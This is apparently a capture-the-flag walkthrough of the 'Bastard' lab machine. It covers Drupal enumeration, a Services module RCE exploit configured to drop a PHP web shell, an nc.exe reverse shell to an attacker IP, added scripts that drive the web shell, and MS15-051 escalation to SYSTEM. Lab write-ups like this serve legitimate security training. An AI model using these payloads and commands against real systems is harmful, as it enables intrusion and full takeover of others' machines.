Machine IP — 10.10.10.9

Nmap
nmap -p- -sCV -A -v 10.10.10.9

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
After enumerating for a while it turns out that Drupal 7 is running on port 80 (IIS 7.5 also tells us this is a Windows Server 2008 R2 box), so let's look for a vulnerability that can give us a shell or at least some useful information.
Let's scan the Drupal install with droopescan:
┌─[root@PREDATOR]─[~]
└──╼ #droopescan scan drupal -u http://10.10.10.9
[+] Themes found:
seven http://10.10.10.9/themes/seven/
garland http://10.10.10.9/themes/garland/
[+] Possible interesting urls found:
Default changelog file - http://10.10.10.9/CHANGELOG.txt
Default admin - http://10.10.10.9/user/login
[+] Possible version(s):
7.54
[+] Plugins found:
ctools http://10.10.10.9/sites/all/modules/ctools/
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/ctools/changelog.txt
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
http://10.10.10.9/sites/all/modules/ctools/API.txt
libraries http://10.10.10.9/sites/all/modules/libraries/
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/libraries/changelog.txt
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/libraries/README.txt
http://10.10.10.9/sites/all/modules/libraries/readme.txt
http://10.10.10.9/sites/all/modules/libraries/README.TXT
http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
services http://10.10.10.9/sites/all/modules/services/
http://10.10.10.9/sites/all/modules/services/README.txt
http://10.10.10.9/sites/all/modules/services/readme.txt
http://10.10.10.9/sites/all/modules/services/README.TXT
http://10.10.10.9/sites/all/modules/services/LICENSE.txt
image http://10.10.10.9/modules/image/
profile http://10.10.10.9/modules/profile/
php http://10.10.10.9/modules/php/
[+] Scan finished (0:40:53.627982 elapsed)
Directory brute forcing with dirsearch also turns up /rest. When we visit http://10.10.10.9/rest we get:
Services Endpoint "rest_endpoint" has been setup successfully.
That message means the Drupal Services module is installed with a REST server exposed at /rest, which is exactly what the exploit below needs.
Now search for an exploit for Drupal 7 with the Services module (searchsploit will do).

Exploit-DB 41564.php (Drupal 7.x Services Module Remote Code Execution, by Charles Fol of Ambionics) is the one we want: the REST endpoint accepts PHP-serialized input, and the exploit abuses that to recover the admin session and then write an arbitrary file through the endpoint. Before running it, change the target, endpoint and payload variables at the top of the script:
$url = '10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$file = [
    'filename' => 'dixuSOspsOUU.php',
    'data' => '<?php echo system($_GET["cmd"]); ?>'
];
Now run the modified script:
┌─[root@PREDATOR]─[~/predator/oscp/htb/bastard/files]
└──╼ #php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: 10.10.10.9/dixuSOspsOUU.php
The exploit dropped a PHP web shell, so any command can now be run through the URL with ?cmd=. The shell runs as the IIS anonymous account and its working directory is the Drupal web root (C:\inetpub\drupal-7.54), so files we copy in land there. First get nc.exe onto the target over SMB:
* Start an SMB share on the attacking machine from the directory that holds nc.exe (impacket's smbserver.py; the share is named raj here):
smbserver.py raj .
* Tell the web shell to copy nc.exe from that share (if you send this with curl rather than a browser, percent-encode the spaces and backslashes):
http://10.10.10.9/dixuSOspsOUU.php?cmd=copy \\10.10.14.2\raj\nc.exe nc.exe
Now that nc.exe is on the target, start a listener on port 443 first:
nc -lvp 443
and then trigger the callback from the web shell:
http://10.10.10.9/dixuSOspsOUU.php?cmd=nc.exe 10.10.14.2 443 -e cmd.exe
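The copy-and-callback step above has one practical snag: the cmd value travels in a GET query string, so spaces and backslashes must be percent-encoded whenever the web shell is driven from the command line instead of a browser. The script below is an added example and not part of the original writeup; it wraps that encoding in a POSIX shell function and builds the URLs for the two commands above. The target, attacker IP, share name and web shell filename are the values used in this writeup; the function names are my own, and the listener must already be running before run_cmd is used with the nc.exe command.

```shell
#!/bin/sh
# Added example (not from the original writeup): drive the Drupal web shell from
# the command line.  The target, attacker IP and web shell filename are the
# values used in this writeup.
TARGET="10.10.10.9"
ATTACKER="10.10.14.2"
WEBSHELL="dixuSOspsOUU.php"

# Percent-encode a string for use as a query value: RFC 3986 unreserved
# characters pass through, everything else (space, backslash, quotes, ...)
# becomes %XX.
urlencode() {
    s="$1"
    out=""
    while [ -n "$s" ]; do
        c=$(printf '%.1s' "$s")   # first character of the remaining input
        s=${s#?}                  # drop it
        case "$c" in
            [a-zA-Z0-9.~_-]) out="$out$c" ;;
            *) out="$out$(printf '%%%02X' "'$c")" ;;
        esac
    done
    printf '%s' "$out"
}

# Full web shell URL for a command.
webshell_url() {
    printf 'http://%s/%s?cmd=%s' "$TARGET" "$WEBSHELL" "$(urlencode "$1")"
}

# The two commands from the writeup, built from the variables above.
copy_nc_cmd() {
    printf 'copy \\\\%s\\raj\\nc.exe nc.exe' "$ATTACKER"
}
revshell_cmd() {
    printf 'nc.exe %s %s -e cmd.exe' "$ATTACKER" "${1:-443}"
}

# Send a command to the web shell and print the response body.
run_cmd() {
    curl -s "$(webshell_url "$1")"
}

# Usage (needs the target reachable and, for the reverse shell, "nc -lvp 443"
# already listening on the attacking machine):
#   run_cmd whoami
#   run_cmd "$(copy_nc_cmd)"
#   run_cmd "$(revshell_cmd 443)"
```

Encoding is done per byte rather than with curl's --data-urlencode because the command has to sit in the query string, where the web shell reads $_GET["cmd"]; a browser does the same encoding silently, which is why the raw URL in the writeup works when pasted into one.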

The shell comes back as nt authority\iusr, and that account can already read user.txt:
C:\Users\dimitris\Desktop>type user.txt
type user.txt
ba22fde1932d06eb76a163d312f921a2
Now for privilege escalation to SYSTEM. systeminfo is the starting point: its output is fed to windows-exploit-suggester.py, which matches the OS build and installed hotfixes against Microsoft's bulletin database and lists the kernel exploits the box is missing patches for.
The systeminfo output already hints at a kernel exploit:
C:\Users\dimitris\Desktop>systeminfo
systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496–001–0001283–84782
Original Install Date: 18/3/2017, 7:04:46
System Boot Time: 28/9/2019, 10:49:30
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.525 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.534 MB
Virtual Memory: In Use: 561 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
The important lines are OS Version 6.1.7600 (Windows Server 2008 R2 without SP1) and Hotfix(s): N/A, so the kernel has never been patched. On previous machines with the same profile MS15-051 (CVE-2015-1701, a win32k.sys privilege escalation) has been a reliable choice; a compiled version is available here:
https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip
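Before copying a kernel exploit over, it is worth checking the saved systeminfo dump offline for the specific fix that exploit needs. The snippet below is an added example, not from the writeup or the exploit author; it extracts the build number and the installed hotfix list from a systeminfo dump and reports whether KB3045171 (the MS15-051 fix, as named in the zip above) is present. The sample dumps are constructed from the values shown on this page plus a made-up patched host for comparison, the function names are my own, and this is the manual version of what windows-exploit-suggester does against the full bulletin database.

```shell
#!/bin/sh
# Added example (not from the original writeup): offline check of a systeminfo
# dump for the MS15-051 fix.  This sample dump is constructed from the output
# shown earlier on this page.
SYSINFO=$(cat <<'EOF'
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
EOF
)

# Constructed dump of a patched host for comparison: systeminfo lists hotfixes
# as numbered "[NN]: KBxxxxxxx" lines after the Hotfix(s) header.
SYSINFO_PATCHED=$(cat <<'EOF'
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB976902
                           [02]: KB3045171
Network Card(s):           1 NIC(s) Installed.
EOF
)

# Build number from the "OS Version:" line.
os_build() {
    printf '%s\n' "$1" | sed -n 's/^OS Version:.*Build \([0-9]*\).*/\1/p'
}

# Installed KBs, one per line, taken from the Hotfix(s) section only so a
# KB mentioned elsewhere in the dump is not counted.
installed_kbs() {
    printf '%s\n' "$1" | sed -n '/^Hotfix(s):/,/^Network Card(s):/p' \
        | grep -o 'KB[0-9]*' | sort -u
}

# Exit 0 if the given KB (with or without the KB prefix) is installed.
kb_installed() {
    installed_kbs "$1" | grep -qx "KB${2#KB}"
}

# "patched" or "unpatched" for MS15-051 (KB3045171).  systeminfo also prints
# "N/A" when it cannot enumerate hotfixes at all, so confirm with
# "wmic qfe list" on the box before trusting an "unpatched" verdict.
ms15_051_status() {
    if kb_installed "$1" KB3045171; then
        echo patched
    else
        echo unpatched
    fi
}

# Usage:
#   os_build "$SYSINFO"                 # 7600
#   installed_kbs "$SYSINFO"            # (nothing: no hotfixes at all)
#   ms15_051_status "$SYSINFO"          # unpatched
#   ms15_051_status "$SYSINFO_PATCHED"  # patched
```

The same pattern extends to any other bulletin: swap the KB number for the one the exploit's README names, and keep in mind that a later cumulative update can supersede the original KB without it appearing in the list, so an absent KB is a lead rather than proof.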
Copy ms15-051.exe to the target through the same SMB share we used for nc.exe:
copy \\10.10.14.2\raj\ms15-051.exe ms15-051.exe
The binary takes a command line as its argument and runs it as SYSTEM:
C:\inetpub\drupal-7.54>ms15-051.exe "whoami"
ms15-051.exe "whoami"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1836 created.
==============================
nt authority\system
The command ran as nt authority\system. Since ms15-051.exe will run any command we give it as SYSTEM, we can hand it the same nc.exe reverse shell command we used earlier instead of whoami, start another nc listener on the attacking machine, and catch a SYSTEM shell.

Done, we got SYSTEM 😌